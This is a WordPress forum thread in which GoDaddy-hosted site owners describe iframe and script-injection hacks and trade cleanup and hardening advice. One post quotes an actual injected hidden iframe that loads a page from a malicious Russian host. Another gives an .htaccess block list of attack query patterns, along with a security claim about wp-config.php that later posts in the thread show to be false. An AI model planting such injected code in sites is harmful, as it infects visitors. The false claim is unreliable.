Exploits and GoDaddy (28 posts)

  1. kendoori
    Posted 7 years ago #

    Until yesterday I was running 2.3, and experienced several exploits over the past few weeks (the site is hosted at GoDaddy). Several PHP files were compromised in these attacks, and the pattern was that an iframe was appended to the files. I have good backups and was quickly able to replace the infected files in each case, only to find several days later that they were once again hit.

    After reading up on this, I upgraded to 2.7.1 yesterday.

    Today upon login to the admin pages, my on-access AV scanner picked up a references to gumblar.cn/rss and on subsequent logins I was warned of .js files associated with the plug-in embedded-link-with-video plug in having the JS:Redirector-H2 [Trojan].

    Since I was not able to observe any changes to WP files when I examined them with FTP, I suspect that the gumblar reference was somehow just cached in my browser, and I cleared the cache, and seem to be clear. I also deactivated the errant plug in.

    Am curious as to whether others are experiencing the same, and what steps are being take to harden sites (especially on GoDaddy). I've contacted their support, but with no response yet.

  2. whooami
    Posted 7 years ago #

    If you have been running 2.3.x you were wide open to a whole host of exploits -- the very least of which is a javascript iframe attack. Hopefully, you have done more than upgrade to insure your site is secure.

  3. kendoori
    Posted 7 years ago #

    Thanks whooami, can you be more specific?

  4. esmi
    Forum Moderator
    Posted 7 years ago #

  5. whooami
    Posted 7 years ago #

    Here goes the standard reply,

    fix advice:

    Make sure that your files on the server are clean. If that means deleting and reuploading, than you ought to do that. Files that you dont replace, should be looked at closely.

    Check for files that dont belong, directories that dont belong. Image files with changed timestamps -- look at those. Its VERY common for there to be scripts on sites that are named in such a way to mask the fact that theyre scripts.

    Be suspicious, when youre looking at things.

    Look at your permissions. Do you have world writable files? Any world-writable directories? Are they necessary?

    You need to check your database. Look for rogue plugins being loaded, look for rogue users (specifically look for a user named wordpress). You will NOT see rogue plugins or rogue users in your wp-admin/ area. You need to check your database.

    Make sure ALL of your plugins are current.

    Make sure your wordpress is current.

    Change your mysql password that wordpress uses (update your wp-config.php with that new password).

    Change any admin level passwords on your blog.

    Look at any other software thats being used on your site. Is it current?

    That's just an outline and not a complete list.

    There's quite a bit to do, but it's all necessary.

  6. Go Daddy
    Go Daddy Support
    Posted 7 years ago #


    I see a lot of great advice here. I also wanted to pipe in and let you know that we can take a look to see if we can identify the source of the issue you're experiencing. If you provide the domain name, I will follow up on the support ticket you submitted.

  7. kendoori
    Posted 7 years ago #

    GDHosting, I'd prefer to not mention the domain publicly. My GD Support ticket references Incident ID: 6153133

    They just suggested I use a stronger FTP password, which I will do.

  8. Go Daddy
    Go Daddy Support
    Posted 7 years ago #

    Thanks for the update. Let me know if I can help in any other way.

  9. kikolani
    Posted 7 years ago #

    I just had a run in with this exploit over the weekend as well, and wrote about it here: PHP Script Injection Exploit in WordPress 2.7.1. I cover how it was detected and resolved.

    Also, while I'm sure it can happen with other hosts as well, my site is also hosted with GoDaddy.

  10. Ryan S
    Posted 7 years ago #

    this is a very common issue with WordPress. WordPress is mot more secure, and hence you must take some measures to protect your blog:

    1) Always upgrade to the latest version. This reduces a lot of holes..
    2) Upgrade all the plugins to their latest versions.
    3) Use a strong password.
    4) Do not use unknown plugins. Deactivate and remove if you are using..

  11. digitalrenewal
    Posted 7 years ago #

    i was hit with this one too, pretty bad. as i design sites and build custom themes, many of my clients were hit as well. avast antivirus (free) is really good at picking up this particular virus on your machine and through firefox.

    thanks kikolani, for your post. looks like i dont have to delete entire installs anymore :) phew!

    also, I found 2 plugins that might help to secure wp better.
    Secure WordPress for the basics and User Locker to guard against brute attacks.

    best of luck to everyone, this virus is a pain in the rump.

  12. Laburriniorg
    Posted 7 years ago #

    The iFrame hack hit me too just one hour ago.
    Me too I'm hosting at GoDaddy at http://www.sarahburrini.com
    And I'm using Comicpress...

    I just want to know if there's anything I can do even if I:
    1) Did not upgrade to WordPress 2.8 (still at 2.7.1.)
    2.) Did not backup BEFORE I was hacked (I know, this will teach me)
    I know WHEN my site was being hacked which makes me also see which files are infected.

    So, is it of any use to reinstall a new WordPress version (2.8) plus the Comicpress theme and to exchange all the infected files and upload my database again?

    Please please help! I put so much work in my Webcomics-site *sniff*
    Thanks in advance!!

  13. carrierawks
    Posted 6 years ago #

    i was hacked by the "Saudi Arabia Hackers" and I am running the latest version of wordpress. What I am wondering is if they broke into my website or my email. I am guessing the backend of my site, because I recieved an email stating that my admin password had been Lost/Changed and now suddenly I cannot recieve my password.

    Maybe there is a major problem with the 2.8.4 version of WordPress? I am not entirely sure and it's kind of weird to me. And very random. Since my site isn't very popular at all.

  14. vinz77
    Posted 6 years ago #

    I suffered from the same. I'm copying my M.O. here, which worked.
    I got
    /homepages/4/d134610354/htdocs/moebius77/blog2/wp-includes/default-widgets.php on line 423 as an error on my blog. No way to login or other. So:
    1) re-install all your WordPress blog, FTP it onto the server again, EXCEPT the WP-Content folder if you want to keep your images and themes.
    2) Now you should be able to login. Go to your dashboard and install plugin "Script Exploiter".
    3) Run the plugin and look for malicious script. In my case, I had this baby:
    <div style="display:none"><iframe src="http://past-another-life.ru:8080/index.php" width=571 height=464 ></iframe></div>
    copied on most of my install.php files, on all the themes (default, etc.), on the plugins and others.
    4) Download the files with the added script, open them with an editor and erase all the garbage.
    5) FTP them back on the server, you should be all right.
    Cheers, hope this helps,

  15. hackersSUCK
    Posted 6 years ago #

    I am a professional WordPress Developer. I have a client that was being hacked almost immediately after installing WordPress on GoDaddy. The WordPress installation right from the get go has a huge problem. The wp-config.php file in the GoDaddy WordPress installation package is exposed because it does not have the closing tag ?> at the end. This means that your SQL DB username and password can be grabbed. I am finding several other security vulnerabilites and am still in the process of isolating all of them. I have been successful at completely blocking the hackers by adding this .htaccess file below until i am completely done plugging all the holes. I would advise anyone who has WordPress installed on GoDaddy to add this .htaccess code to their website immediately. I have notified GoDaddy yesterday 2-13-2010, but i am not going to wait around for them to act and take care of this. Some of the hacks that occurred to this client. XSS hidden iframe injection, XSS injected code throughout the site affecting all critical .js files, backdoors set up everywhere, the /stats folder on godaddy has a huge security vulnerability - the primary host account password can be grabbed, there are several other security vulnerabilities that i am finding and will add a full detailed report once i have that info. For now like i said i am successfully blocking the hackers with this very restrictive .htaccess file. it will actually block you from activating plugins in your admin panel. this is an temporary inconvenience of course, but for now it is absolutely necessary for ABSOLUTE LOCKDOWN of your website. Everything else is fine ie your website is funtional and viewable by the world and can be indexed by search engines without any problems. Until i am 100% sure that i have discovered every single security vulnerability i am not giving these pricks a shot. And they have been trying now for 2 days. Since they are no longer able to clean their tracks from the logs i am watching the logs fill up with failed attempts after failed attempts at hacking this site.
    I recommend you first create a maintenance mode php script and .htaccess file for your website so that if my very restrictive .htaccess file does not allow your site to fully function properly you can just have your site display that is being worked on and under maintenance (503 status code) until you can fix everything. Once again i will post a full description of all godaddy security vulnerabilities and fixes here later once i have completed all of my investigations. This is a 503 error status that you will not be penalized for by search engines.
    create a php file called maintenanceXXXXX.php (add something unique to replace the XXXXX's) from this code

    header('HTTP/1.1 503 Service Temporarily Unavailable',true,503);
    header('Status: 503 Service Temporarily Unavailable');
    header('Retry-After: 172800');
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
    <meta http-equiv="Content-Language" content="en-us">
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
    <meta name="robots" content="noindex,nofollow">
    <title>503 - Temporarily Closed For Maintenance</title>
    <style type="text/css">
        font-family: "Verdana", sans-serif;
    <p><b>Natural Herbal Remedies</b></p>
    <p>is temporarily closed for maintenance.</p>
    <p>Normal operation will resume as soon as possible.</p>

    the maintenance mode 503 .htaccess file code

    RewriteEngine On
    RewriteBase /
    # When enabled, the next code line allows testing.
    # It says only do the rewrite if the request is from YOUR IP address.
    # Thus, you can close the site only to YOURSELF to make sure it works,
    # then comment out the line again to close the site to everyone.
    # Set it to your actual IP address at the time of the test.
    RewriteCond %{REMOTE_ADDR} ^000\.000\.000\.000$
    # The remaining two code lines close the site. They say:
    # if the request is NOT for /maintenance.php, send /maintenance.php instead.
    # You MUST allow at least one file to be served without rewriting it,
    # (maintenance.php in this example), to prevent endless looping.
    RewriteCond %{REQUEST_URI} !^/maintenance\.php$
    # To allow another file, copy the line above to here and change the filename.
    # This line says: no matter what file was requested, serve maintenance.php.
    # This is a rewrite (not a redirect), so we use the local file path, no http://
    RewriteRule ^(.*)$ /maintenanceXXXX.php [L]

    ok now for the very restrictive .htaccess file

    setenv PHPVERSION 5
    ### Turning on the RewriteEngine ####
    RewriteEngine on
    RewriteBase /
    ServerSignature Off
    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    # END WordPress
    <IfModule mod_rewrite.c>
    RewriteRule ^(.*)$ - [F,L]
    <IfModule mod_rewrite.c>
    RewriteCond %{QUERY_STRING} \.\.\/ [NC,OR]
    RewriteCond %{QUERY_STRING} boot\.ini [NC,OR]
    RewriteCond %{QUERY_STRING} tag\= [NC,OR]
    RewriteCond %{QUERY_STRING} ftp\:  [NC,OR]
    RewriteCond %{QUERY_STRING} http\:  [NC,OR]
    RewriteCond %{QUERY_STRING} https\:  [NC,OR]
    RewriteCond %{QUERY_STRING} mosConfig [NC,OR]
    RewriteCond %{QUERY_STRING} ^.*(\[|\]|\(|\)|<|>|’|"|;|\?|\*).* [NC,OR]
    RewriteCond %{QUERY_STRING} ^.*("|'|<|>|\|{||).* [NC,OR]
    RewriteCond %{QUERY_STRING} ^.*(%0|%A|%B|%C|%D|%E|%F|127\.0).* [NC,OR]
    RewriteCond %{QUERY_STRING} ^.*(globals|encode|localhost|loopback).* [NC,OR]
    RewriteCond %{QUERY_STRING} ^.*(request|select|insert|union|declare|drop).* [NC]
    RewriteRule ^(.*)$ - [F,L]

    This .htaccess file is so restrictive it will also block you as an admin from activating plugins, but i have been monitoring a hacker for days trying every possible XSS attack string and i see nothing but denied, not allowed, etc. messages in the website error log.

    once again i will post a more detailed godaddy wordpress security report once i have completed all of my findings. i am currently looking at the webformmailer.php file that is installed on all godaddy accounts by default - it appears that it is being exploited. You may want to temporarily disable it. gdform.php so far appears to be ok. I recommend that you immediately check your MySQL on your godaddy account and look for any databases that you did not create. clear all of the tables immediately. the db i found was called __piggy. More complete info on this will be posted tomorrow or latest tuesday. Slam the doors on these dirt bags. Good luck to all.

  16. Samuel B

    Posted 6 years ago #

    . The wp-config.php file in the GoDaddy WordPress installation package is exposed because it does not have the closing tag ?> at the end

    I commend your attempts at tracking down the hacker, but the above is certainly not a bug or vulnerability - it is done intentionally to have well-formed php code.

    If you think this is a vulnerability, please post a way to test this on a live site and we will take this seriously. Otherwise you are wildly speculating.

  17. hackersSUCK
    Posted 6 years ago #

    you will not be able to install and activate ONLY new installed plugins. You can deactivate and reactivate all of your existing installed plugins.

  18. hackersSUCK
    Posted 6 years ago #

    Hmm ok maybe I'm not exactly correct in stating that the closing tag is absolutely necessary, but i have always seen it in all other hosts wp-confi.php files. You wouldn't be a hacker by any chance would you? ;) What i do know for sure is that i installed WordPress on GoDaddy and within hours it was hacked. I installed WordPress on another totally new godaddy account and within hours it was hacked. What i also know for sure is that my .htaccess file is a smack down for these amateurs. DENIED DENIED DENIED DENIED. ;)

  19. hackersSUCK
    Posted 6 years ago #

    The other thing i wanted to mention is that the client also had an HTML site with a body onload that was not filtered and that site was also XSS hacked.

  20. Samuel B

    Posted 6 years ago #

    a search of these forums will show godaddy sites - not just wp - are getting hacked at a bizarre rate. I'm more inclined to believe it is godaddy's antiquated shared servers and security software.

  21. hackersSUCK
    Posted 6 years ago #

    I agree with you 100% sambell. It has nothing to do with WordPress at all really. WordPress is very, very, very secure and I have rarely had to "fix" a hacked WordPress site on other hosts. Unless the client has made the mistake and opened the door(s) themselves. Was totally kidding of course about the asking you if your were a hacker - that was a joke - i didn't make that absolutely clear that i was just joking with you. ;) I am finding all sorts of other security vulnerabilites with default godaddy files and obviously hackers know this and are hovering like vultures waiting for their next meal. I also wanted to point out that i used the godaddy application installer to install WordPress - I did not do a clean install of WP. Yeah i know I am asking for it by using their prebundled WordPress package. ;)

  22. hackersSUCK
    Posted 6 years ago #

    Instead of posting my final GoDaddy security vulnerabilites info here I'll post it on my site since this is primarily a GoDaddy security issue not a WordPress security issue. thanks sambell for pointing out the wp-config.php correct info. I wasn't 100% sure about that closing tag statement I made and I should have double checked before posting that info. ;)

  23. Samuel B

    Posted 6 years ago #

    I definitely wasn't getting on to you. WordPress has had vulnerabilities exposed in the past like all php apps. They do move extremely quickly to fix them, however, and recent version still holds secure.
    2 hosts seem to be lacking in security as a general pattern, though. godaddy and hostgator. a lot of hacked sites.
    I hope you get results.

  24. beyers13
    Posted 6 years ago #

    hackersSUCK....could you let me know what your website is? I am having some major issues with godaddy hosted WordPress sites as as well. I was recently hacked and it is affecting all my .js files I keep clearing the malware code but it keeps reappearing. It does get some of my PHP files but not many. I have done all the changing of passwords, checked databases, etc. I am now using you .htaccess code but it completely blocks my site like you said it might.

  25. beyers13
    Posted 6 years ago #

    i added the .htaccess to the wp-admin area and my site works now, is that where it should be or should it be or should it be where I had it in the html folder on godaddy.

  26. glennn
    Posted 6 years ago #

    i've just been hacked on Godaddy's servers in a ZenCart install with a WordPress install. it's this iframe injection:

    [Code moderated. Please do not post hack code blocks in the forums. Please use the pastebin]

    can someone tell me where to look to find the exploit, please?

  27. Go Daddy
    Go Daddy Support
    Posted 6 years ago #

    We security very seriously and have a 24/7 Dedicated Security Team that investigates security issues daily. Our team also works with industry security organizations to work to provide the safest hosting environment for our customers.

    We've verified that the missing ?> tag on the php scripts, and as mentioned, is *not* required. More information can be found at http://php.net/manual/en/language.basic-syntax.instruction-separation.php

    If your site has been compromised, we recommend taking a look at this resource from the Go Daddy help center on identifying, removing and preventing malware - http://fwd4.me/Lf5


  28. Steve D
    Posted 6 years ago #

    Not trying make waves here GD. Whats the bottom line? We find out today the criminals breached the U.S. Treasury Department sites on NS. You guys are now being hammered.

    Have you guys considered the criminals have launched serious guerrilla cyber warfare on you and NS? I mean let's get serious. Us little guys are getting hit left and right with flack. And band aids aren't stopping the bleeding.

Topic Closed

This topic has been closed to new replies.

About this Topic